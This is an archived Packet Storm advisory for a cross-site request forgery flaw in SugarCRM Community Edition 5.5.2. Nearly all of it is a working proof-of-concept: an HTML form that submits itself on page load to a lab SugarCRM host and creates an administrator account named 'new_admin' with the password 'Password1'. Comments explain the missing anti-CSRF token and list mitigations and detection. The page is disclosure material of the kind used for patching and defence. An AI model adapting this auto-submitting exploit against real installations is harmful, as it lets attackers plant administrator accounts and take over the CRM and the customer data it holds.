SugarCRM Community Edition 5.5.2 Cross Site Request Forgery

2010-05-30T00:00:00
ID PACKETSTORM:90090
Type packetstorm
Reporter AutoSec Tools
Modified 2010-05-30T00:00:00

Description

                                        
<!--=========================================================================================================#  
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #  
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #  
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #  
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #  
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #  
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #  
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #  
# #  
#============================================================================================================#  
# #  
# Vulnerability............Cross-site Request Forgery #  
# Software.................SugarCRM Community Edition 5.5.2 #  
# Download.................http://www.sugarcrm.com/crm/download/sugar-suite.html #  
# Date.....................5/30/10 #  
# #  
#============================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# Email....................john.leitch5@gmail.com #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
# A cross-site request forgery vulnerability in SugarCRM Community Edition 5.5.2 can be exploited to create #  
# a new admin. #  
# #  
# #  
# ##Proof of Concept## #  
# -->  
<!-- Proof-of-concept page for the advisory above. Everything below is a plain HTML form that is
     auto-submitted on load; nothing in it is server-side code. Root cause being demonstrated: the
     request that follows contains no per-session anti-CSRF token (there is no such hidden field in
     the form), so the server cannot tell a forged cross-site submission from a legitimate one.
     Mitigation: validate a synchronizer token on every state-changing request (here the Users/Save
     handler) and, as defence in depth, mark the session cookie SameSite. For detection, look for
     Users/Save requests whose Origin/Referer is not the application's own host. -->
<html>
<!-- Submits the first form without any user interaction as soon as the page has loaded. -->
<body onload="document.forms[0].submit()">
<!-- POST to the application's front controller. 192.168.1.4 is an RFC 1918 private address
     (a lab host in the original write-up). The browser attaches the victim's existing session
     cookie to this request, which is what CSRF relies on. -->
<form method="POST" action="http://192.168.1.4/sugarcrm/index.php">
<!-- The fields below appear to be a copy of the legitimate user EditView form; most carry
     default or empty values. Only the routing and privilege fields are called out. -->
<input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&display_tabs[]=Dashboard&display_tabs[]=Calendar&display_tabs[]=Activities&display_tabs[]=Leads&display_tabs[]=Contacts&display_tabs[]=Accounts&display_tabs[]=Opportunities&display_tabs[]=Emails&display_tabs[]=Campaigns&display_tabs[]=Cases&display_tabs[]=Documents&" />
<input type="hidden" name="hide_tabs_def" value="" />
<input type="hidden" name="remove_tabs_def" value="" />
<!-- Routing: module=Users, action=Save, page=EditView selects the user-save handler.
     record is empty, i.e. a new user record rather than an update of an existing one. -->
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="record" value="" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="page" value="EditView" />
<input type="hidden" name="return_module" value="Users" />
<input type="hidden" name="return_id" value="" />
<input type="hidden" name="return_action" value="DetailView" />
<input type="hidden" name="password_change" value="true" />
<input type="hidden" name="required_password" value="1" />
<input type="hidden" name="user_name" value="" />
<input type="hidden" name="type" value="" />
<input type="hidden" name="is_group" value="0" />
<input type="hidden" name="portal_only" value="" />
<!-- Privilege fields: is_admin / is_current_admin set to 1 and UserType=Administrator (below)
     are what turn this from "create a user" into "create an administrator". A server-side fix
     must also re-check that the acting session is itself an administrator before honouring these. -->
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="is_current_admin" value="1" />
<input type="hidden" name="required_email_address" value="0" />
<!-- Username of the account the forged request would create (sample value from the write-up). -->
<input type="hidden" name="sugar_user_name" value="new_admin" />
<input type="hidden" name="unique_name" value="" />
<input type="hidden" name="first_name" value="" />
<input type="hidden" name="status" value="Active" />
<input type="hidden" name="last_name" value="a" />
<input type="hidden" name="UserType" value="Administrator" />
<input type="hidden" name="old_password" value="" />
<!-- Password for the new account, set directly because password_change=true above;
     old_password is empty, so no knowledge of an existing credential is required. -->
<input type="hidden" name="new_password" value="Password1" />
<input type="hidden" name="confirm_new_password" value="Password1" />
<input type="hidden" name="emailAddressWidget" value="1" />
<input type="hidden" name="emailAddress0" value="" />
<input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" />
<input type="hidden" name="emailAddressVerifiedFlag0" value="true" />
<input type="hidden" name="emailAddressVerifiedValue0" value="" />
<input type="hidden" name="useEmailWidget" value="true" />
<input type="hidden" name="email_link_type" value="sugar" />
<input type="hidden" name="mail_smtpuser" value="" />
<input type="hidden" name="mail_smtppass" value="" />
<input type="hidden" name="employee_status" value="Active" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="phone_work" value="" />
<input type="hidden" name="department" value="" />
<input type="hidden" name="phone_mobile" value="" />
<input type="hidden" name="reports_to_name" value="" />
<input type="hidden" name="reports_to_id" value="" />
<input type="hidden" name="phone_other" value="" />
<input type="hidden" name="phone_fax" value="" />
<input type="hidden" name="phone_home" value="" />
<input type="hidden" name="messenger_type" value="" />
<input type="hidden" name="messenger_id" value="" />
<input type="hidden" name="address_street" value="" />
<input type="hidden" name="address_city" value="" />
<input type="hidden" name="address_state" value="" />
<input type="hidden" name="address_postalcode" value="" />
<input type="hidden" name="address_country" value="" />
<input type="hidden" name="description" value="" />
<!-- Remaining fields are user-preference defaults (notification, locale, formats, timezone);
     they are presumably required by the handler but carry no security significance. -->
<input type="hidden" name="receive_notifications" value="12" />
<input type="hidden" name="export_delimiter" value="," />
<input type="hidden" name="mailmerge_on" value="0" />
<input type="hidden" name="reminder_time" value="60" />
<input type="hidden" name="default_export_charset" value="ISO-8859-1" />
<input type="hidden" name="user_max_tabs" value="12" />
<input type="hidden" name="user_max_subtabs" value="12" />
<input type="hidden" name="user_subpanel_tabs" value="on" />
<input type="hidden" name="dateformat" value="m/d/Y" />
<input type="hidden" name="currency" value="-99" />
<input type="hidden" name="timeformat" value="H:i" />
<input type="hidden" name="default_currency_significant_digits" value="2" />
<input type="hidden" name="timezone" value="Africa/Abidjan" />
<input type="hidden" name="ut" value="0" />
<input type="hidden" name="num_grp_sep" value="," />
<input type="hidden" name="default_locale_name_format" value="s f l" />
<input type="hidden" name="dec_sep" value="." />
<input type="hidden" name="calendar_publish_key" value="" />
<input type="hidden" name="outboundtest_from_address" value="" />
</form>
</body>
</html>